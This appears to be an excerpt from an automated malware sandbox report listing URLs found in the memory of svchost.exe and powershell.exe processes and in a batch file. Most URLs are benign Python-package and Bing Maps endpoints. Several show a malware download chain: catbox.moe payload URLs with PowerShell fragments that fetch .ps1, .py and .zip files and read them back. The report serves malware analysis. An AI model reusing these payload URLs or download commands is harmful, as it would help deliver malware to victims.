                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bestpractices.coreinfrastructure.org/projects/6227
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bestpractices.coreinfrastructure.org/projects/6227/badge
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681BC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue658327
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/gh/pypa/setuptools
                    Source: powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000F.00000002.2351984899.000001B647C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368170C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deps.dev/pypi/urllib3
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000000.00000002.1372125562.000002728C270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369651169.000002728C25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369059845.000002728C26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369517570.000002728C25F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000000.00000002.1372125562.000002728C270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369059845.000002728C26E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000000.00000002.1372104101.000002728C268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369418188.000002728C267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000000.00000002.1372145591.000002728C277000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1368314641.000002728C275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369651169.000002728C25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000000.00000002.1372104101.000002728C268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369418188.000002728C267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000000.00000003.1369711360.000002728C241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/channels/803025117553754132/815945031150993468
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/urllib3
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/urllib3)
                    Source: svchost.exe, 00000000.00000003.1369757208.000002728C231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000000.00000003.1369463556.000002728C262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372077351.000002728C263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000000.00000003.1369711360.000002728C241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371978908.000002728C242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000000.00000003.1368314641.000002728C275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000000.00000003.1369733131.000002728C257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1372029797.000002728C258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000000.00000002.1372104101.000002728C268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1371933085.000002728C22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1369418188.000002728C267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
                    Source: configuration.py.9.drString found in binary or memory: https://example.org/
                    Source: powershell.exe, 00000009.00000002.2045048921.00000236FD9E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catb
                    Source: powershell.exe, 0000000D.00000002.2400933097.0000025E81163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbPZ5
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E803B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81163000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637FB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/1qm51s.zip
                    Source: powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp, 2zirzlMVqX.batString found in binary or memory: https://files.catbox.moe/d6pvcr.zip
                    Source: powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/d6pvcr.zip-OutFilefun.zip;Add-Type-AssemblySystem.IO.Compression.Filesystem
                    Source: powershell.exe, 0000000D.00000002.2400933097.0000025E80001000.00000004.00000800.00020000.00000000.sdmp, 2zirzlMVqX.batString found in binary or memory: https://files.catbox.moe/ei5hyq.ps1
                    Source: powershell.exe, 0000000D.00000002.2607763585.0000025EF5249000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2612393541.0000025EF5500000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2619098542.0000025EF735A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2617465860.0000025EF7312000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2612973389.0000025EF6B50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2617465860.0000025EF734C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/ei5hyq.ps1-OutFilefunny.tmp-UseBasicParsing;Get-Content-Rawfunny.tmp
                    Source: powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp, 2zirzlMVqX.batString found in binary or memory: https://files.catbox.moe/gw2gji.py
                    Source: powershell.exe, 00000004.00000002.1300280534.000001DCD1F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1300062846.000001DCD1E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gw2gji.py-UseBasicParsing).Content
                    Source: powershell.exe, 00000004.00000002.1299331743.000001DCD1B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gw2gji.pyDefaYT
                    Source: powershell.exe, 00000004.00000002.1299331743.000001DCD1B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gw2gji.pymTe
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236803D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E803B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E81633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2400933097.0000025E80398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B637FB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3129
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681ACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023682184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368218D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                    Source: powershell.exe, 0000000F.00000002.2170524020.000001B637D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/haikuginger)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/illia-v)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368170C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236818C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjd/idna
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368185F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/koenvo/pyodide-http/issues/22
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lukasa)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/issues/14579
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pquentin)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/pyopenssl/pull/933
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023680657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368064D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/pip/issues/3383#issuecomment-173267692
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/actions/workflows/main.yml/badge.svg
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/discussions
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236813B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236813A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368075D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368073B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-hyper/rfc3986
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023682337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/fcf1d003bf4f0100c/Lib/platform.py#L175-L183
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/113199
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236820A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236820B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/59999
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368237A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023682388000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/mypy/issues/731
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368062B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/mypy/pull/13475#pullrequestreview-1079784515
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/sethmlarson)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/shazow)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/sigmavirus24)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/theacodes)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3):
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3.git
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/actions?query=workflow%3ACI
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/blob/main/CHANGES.rst
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368142D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368144D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168z(Andrey
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681ACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681C66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236819C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2791
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236815BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.00000236815C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.000002368197E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368142D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
                    Source: powershell.exe, 00000009.00000002.1946719482.000002368144D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023681458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020)
                    Source: powershell.exe, 00000009.00000002.1946719482.0000023681688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3267.
                    Source: powershell.exe, 00000009.00000002.1946719482.00000236816AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/651
